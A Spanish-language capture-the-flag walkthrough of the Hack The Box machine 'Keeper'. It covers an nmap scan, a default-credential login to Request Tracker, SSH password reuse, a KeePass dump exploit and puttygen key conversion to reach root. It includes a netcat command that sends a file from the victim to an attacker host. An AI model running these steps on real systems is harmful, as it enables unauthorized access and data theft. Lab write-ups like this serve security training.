M4nu
  • whoami
  • 🏆 Certificaciones
    • eJPTv2
    • eCPPTv3
    • KLCP
  • CWP
  • 🏗️Mis Proyectos
    • Apache Hunter
    • Águila
      • Águila-Https
        • Configuración Proxy Automático
        • Configuración Proxy Manual
      • Águila-Http
      • Águila-Infection
    • PingMapper
    • WizardScan
    • FakeHosts
    • EvasionIDS
    • nmap2ports
  • 📝 Write Ups
    • Hack The Box
      • Windows
        • Granny
        • Escape
        • Bastard
      • Linux
        • Keeper
        • BoardLight
        • Backdoor
      • Active Directory
        • Sauna
        • Monteverde
        • ServMon
    • Proving Grounds Practice
      • Linux
        • Twiggy
      • Windows
        • Algernon
        • Craft
  • 📚Apuntes
    • Nmap
      • Esencial ⭐
      • Reconocimiento de Hosts
      • Scripts
      • Evasión de Firewalls y IDS/IPS
      • IPv6
    • Best of Nuclei
      • Plantillas para Wordpress
    • Tor en línea de comandos
Con tecnología de GitBook
En esta página
  • Reconocimiento
  • Explotación
  • Escalada de Privilegios
  1. 📝 Write Ups
  2. Hack The Box
  3. Linux

Keeper

AnteriorLinuxSiguienteBoardLight

Última actualización hace 8 meses

Reconocimiento

# Nmap 7.94SVN scan initiated Tue Sep 24 08:59:25 2024 as: nmap -p22,80 -sCV --min-rate 5000 -n -Pn -oN Target 10.10.11.227
Nmap scan report for 10.10.11.227
Host is up (0.043s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
|_  256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Explotación

Buscamos credenciales por defecto y encontramos "Log in. Use a browser to log into RT. Username is root , and password is password" así que probamos y nos metemos ocn exito, dentro de Request Traker, que para el que no lo sepa sirve para "El software Request Tracker permite administrar prioridades, registrar toda la información suministrada, asignar fechas de terminación y el tiempo estimado entre muchas otras funcionalidades más. Además, desde una instalación, se le puede dar seguimiento a varios proyectos o servicios."

Una vez dentro buscamos en usuarios, y encontramos el usuario lnorgaard y en la sección de comentarios encontramos su contraseña:

El ssh eesta abierto así que vamos a probar a reutilizar la contraseña, y nos deja entrar en el ssh

Escalada de Privilegios

Dentro del directorio de lnorgaard encontramos un zip, que si lo trasferimos a nuestra máquina de la siguiente manera:

# Máquina vícitma
nc <ip> 443 < ejemplo.txt

# Maquina atacante
nc -nlvp 443 > ejemplo.txt

Si buscamos en internet exploit para sacarle la constraseña a un .dmp de keepass, encontramso el siguiente exploit:

Copiamos una de la posibles contraseñas y la pegamos en internet:

Encontramos la frase, pero recordar que es en minúscula, el exploit nos a dado la contraseña en minúscula, entonces una vez con esta contraseña, abrimos el keepass y la adjuntamos:

Dentro encontramos una private_key como una contraseña, la contraseña no es la de acceso a el ssh y la id_rsa me da el siguiente error, tenemos que conseguir que la clave privada pase a .pem para poder utilizarla, para ello vamos a buscar en google como se hace, cogiendo el nombre de la private_key:

En este articulo encontramos los siguientes comandos:

puttygen private_key -O private-openssh -o pem_file.pem

y una vez con esto entramos al ssh como root:

Lo primero que vemos al abrir la página web es una redirección a una vez que nos metemos encontramos un login de una plataforma creada con Request Traker:

http://tickets.keeper.htb/rt/
https://app.hackthebox.com/machines/556
https://raw.githubusercontent.com/matro7sh/keepass-dump-masterkey/refs/heads/main/poc.py
How to Convert PPK to PEM file using Command – TecAdminTecAdmin
Logo